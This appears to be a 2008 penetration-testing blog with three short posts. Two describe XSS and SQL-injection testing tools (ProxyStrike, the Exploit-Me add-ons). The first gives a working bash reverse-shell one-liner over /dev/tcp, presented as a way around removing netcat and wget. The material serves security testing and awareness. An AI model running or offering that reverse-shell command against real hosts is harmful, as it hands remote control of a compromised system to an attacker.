Bash based reverse shell wickedness

April 17, 2008

Shell

Neohapsis just created a lot of pain for those who are trying to stop folks who able to execute arbitrary code on a host, but unable to get a reverse shell.  Used to be you could remove netcat, wget, ftp, etc… and make it much more difficult for a reverse shell to be started.  Enter the ever friendly and helpful Bash shell.

All you need is:

$ exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0

and tadaa, reverse shell.

Go check it out – http://labs.neohapsis.com/2008/04/17/connect-back-shell-literally/

Kevin Riggins


ProxyStrike – Background SQL Injection and XSS analysis

April 8, 2008

The folks over at Darknet do a great job of pointing out interesting tools for use in penetration testing and web app security testing among other things. I won’t be duplicating their feed here, but when I see something that I want to test for myself, I will be posting about it.

One such tool that I have been playing with a little over the couple of days is Edge-Security – ProxyStrike v1.0. from their site:

The process is very simple, ProxyStrike runs like a passive proxy listening in port 8008 by default, so you have to browse the desired web site setting your browser to use ProxyStrike as a proxy, and ProxyStrike will analyze all the paremeters in background mode. For the user is a passive proxy because you won’t see any different in the behaviour of the application, but in the background is very active. 🙂

Nifty, I don’t have to do anything, but browse about and rack up the vulnerability counts 🙂 Well, it is not quite that easy, but works quite well in the limited testing I have done using DVL.  I will be playing with it more and will report back what I find.


Liteweight XSS and SQL Injection testing tools

March 30, 2008

Sometimes it is nice to have a quick tool that will scan a site for basic XSS or SQL Injection vulnerabilities. It is even nicer if you don’t have to go through some long drawn out setup procedure just to see if a field has any tasty morsels to chew on. Enter a free suite of tools call Exploit-Me by
Security Compass – Application Security.

The suite currently consists of two tools:

  1. XSS-Me – a tool to test for Cross-Site Scripting vulnerablities
  2. SQL Inject-Me – a tool to test for SQL Injection vulnerabilitie

The beauty of the Exploit-Me suite is the tools are Firefox add-ons and don’t require a proxy.Install the add-on and when you are on a page you want to test, just open the sidebar and go to town.

Take a peek. I think you’ll like them.

-Kevin Riggins